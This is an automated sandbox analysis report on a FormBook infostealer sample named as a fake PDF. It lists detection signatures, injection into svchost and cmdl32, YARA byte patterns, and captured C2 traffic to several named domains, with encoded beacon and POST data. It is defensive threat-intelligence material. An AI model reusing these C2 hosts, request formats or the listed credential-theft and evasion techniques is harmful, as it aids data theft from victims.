
Windows Analysis Report
Product Data Specifications_PDF.exe

Overview

General Information

Sample name: Product Data Specifications_PDF.exe
Analysis ID: 1519456
MD5: 94cc1457803df28f1d4c7a39db96e956
SHA1: 0b1f19f44e162dcc5e06d5619b0e72d3e654293b
SHA256: 64f6025326f3f7edca173d44ef56a85198b28c132b7e0afd3b599ccc3b593624
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Product Data Specifications_PDF.exe (PID: 2816 cmdline: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" MD5: 94CC1457803DF28F1D4C7A39DB96E956)
    • svchost.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • EyHLOQmzGKBL.exe (PID: 2340 cmdline: "C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdl32.exe (PID: 7556 cmdline: "C:\Windows\SysWOW64\cmdl32.exe" MD5: BD60DF43E6419AFE39B3FCBFB14077E7)
          • EyHLOQmzGKBL.exe (PID: 6908 cmdline: "C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c4e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1456f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c4e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1456f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
9.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
9.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e7e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine|base64offset|contains: Z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, ParentProcessId: 2816, ParentProcessName: Product Data Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ProcessId: 7336, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", CommandLine|base64offset|contains: Z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ParentImage: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, ParentProcessId: 2816, ParentProcessName: Product Data Specifications_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\Product Data Specifications_PDF.exe", ProcessId: 7336, ProcessName: svchost.exe
            No Suricata rule has matched


            AV Detection

Source: Product Data Specifications_PDF.exe, Avira: detected
Source: Product Data Specifications_PDF.exe, ReversingLabs: Detection: 55%
Source: Yara match, File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Product Data Specifications_PDF.exe, Joe Sandbox ML: detected
Source: Product Data Specifications_PDF.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EyHLOQmzGKBL.exe, 0000000B.00000002.3150184532.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3158489815.0000000000C2E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000009.00000003.1733070057.0000000003025000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1733005926.000000000301B000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000B.00000002.3155445381.0000000001368000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Product Data Specifications_PDF.exe, 00000006.00000003.1378207323.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Product Data Specifications_PDF.exe, 00000006.00000003.1378088013.0000000004640000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1668357541.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1666529619.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1764371082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 0000000C.00000002.3158930427.0000000004DC0000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3158930427.0000000004F5E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1783633170.0000000004C14000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 0000000C.00000003.1781322079.0000000004A6B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 0000000C.00000002.3159746980.00000000053EC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3155201371.0000000003178000.00000004.00000020.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000279C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020B1C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00452492
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00442886
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 6_2_004788BD
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 6_2_004339B6
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 6_2_0045CAFA
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00431A86
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 6_2_0044BD27
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_0045DE8F FindFirstFileW,FindClose, 6_2_0045DE8F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_0044BF8B
Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 12_2_02BAC980 FindFirstFileW,FindNextFileW,FindClose, 12_2_02BAC980
Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 4x nop then xor eax, eax 12_2_02B99B30
Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 4x nop then pop edi 12_2_02B9E4DF
Source: C:\Windows\SysWOW64\cmdl32.exe, Code function: 4x nop then mov ebx, 00000004h 12_2_04C104DE
Source: Joe Sandbox View, IP Address: 162.0.238.43
Source: Joe Sandbox View, IP Address: 45.114.171.236
Source: Joe Sandbox View, IP Address: 84.32.84.32
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe, Code function: 6_2_004422FE InternetQueryDataAvailable,InternetReadFile, 6_2_004422FE
Source: global traffic, HTTP traffic detected: GET /vzgx/?fRr0=tfAptZ&Z0=fAt7pIVPpGXAvBzcGITPA7OHGvP4drUtR0TDZSipM2iZbUNyxYUxCE+UHA0v6t9lkzzVyERFWiUA+TPVxmGbgZvp38A33fVcU72oeaDS2r7GjI1g6DEPKEsN3N2XW07UJj8EjHQ8jzqg HTTP/1.1 | Host: www.trapkitten.website | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, HTTP traffic detected: GET /toq1/?Z0=uFBHOFjbtFvxqkces1RGqIZYNgmiur5XIDe+8RHTfxNdoahKRW8Ulx3EiPWAiOWTg+KGn77UKm1RYG+ByVGjA2HLhLGNIPNt7CZLxVcbhsRd+xmlQzDGNJYRcWCQEWce52MF6lNTmRQD&fRr0=tfAptZ HTTP/1.1 | Host: www.qwefs.org | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, HTTP traffic detected: GET /wc8m/?fRr0=tfAptZ&Z0=LNw/HBPP4tr5bvxS3kL5kO0L1X3Nhxx3YB7NlE9rWxPCxu7fGi7WEXTbZRsRhvhxvKZ1WqSKGQ11o+IxPCwZhMc0vkrsKf8OYx9AcoiAA17H2AQJPV0Zg3KmaIPVvP4iA0nhUXGrqtBT HTTP/1.1 | Host: www.dfmagazine.shop | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, HTTP traffic detected: GET /za6x/?fRr0=tfAptZ&Z0=EgAkyEJNK52+6mt0ZZzaOaTRCjAqhTrWwvgRo5oIQtO9ZSuXgOHTRb0W4iTGk1GYFMCByhdBFH2COuTwpe8yjCAk5/Of1W40SqKn8hyiq9h4asN2CcaU88uOnsZx5gwZ1TVihW9sV3GM HTTP/1.1 | Host: www.disn-china.buzz | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, HTTP traffic detected: GET /gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ HTTP/1.1 | Host: www.kevin-torkelson.info | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, HTTP traffic detected: GET /to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ HTTP/1.1 | Host: www.mandemj.top | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Source: global traffic, DNS traffic detected: DNS query: www.trapkitten.website
Source: global traffic, DNS traffic detected: DNS query: www.qwefs.org
Source: global traffic, DNS traffic detected: DNS query: www.dfmagazine.shop
Source: global traffic, DNS traffic detected: DNS query: www.mktimediato.online
Source: global traffic, DNS traffic detected: DNS query: www.disn-china.buzz
Source: global traffic, DNS traffic detected: DNS query: www.kevin-torkelson.info
Source: global traffic, DNS traffic detected: DNS query: www.mandemj.top
Source: unknown, HTTP traffic detected: POST /toq1/ HTTP/1.1 | Host: www.qwefs.org | Accept: */* | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Origin: http://www.qwefs.org | Content-Length: 215 | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Connection: close | Referer: http://www.qwefs.org/toq1/ | User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) | Data Ascii: Z0=jHpnN1fKvmiF9EESjFZnzp56AheLqaYiSTvf7QG1SjZzhtlSb0cLzEGngdS0nreMi6Hjx466OklRbTnig3mhRWyzrpy5DtBAmSZphnclu8JnynaxEDzCC485JT+oKXxA7mwStiM1iA89Qobb4MUmTblEO/GGRxLqaeOoM0voCtJeeo18oE0xsuzXX0eyq5pe74Bl3X2C/lRUIqbW/Q==
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 26 Sep 2024 13:24:03 GMT | Content-Type: text/html | Content-Length: 634 | Connection: close | Server: Apache | Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:25:09 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:25:12 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:25:15 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:25:17 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:24:54 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | ETag: W/"66cd104a-b96" | Content-Encoding: gzip
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:24:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | ETag: W/"66cd104a-b96" | Content-Encoding: gzip
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 26 Sep 2024 13:24:59 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | ETag: W/"66cd104a-b96" | Content-Encoding: gzip
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 26 Sep 2024 13:25:02 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 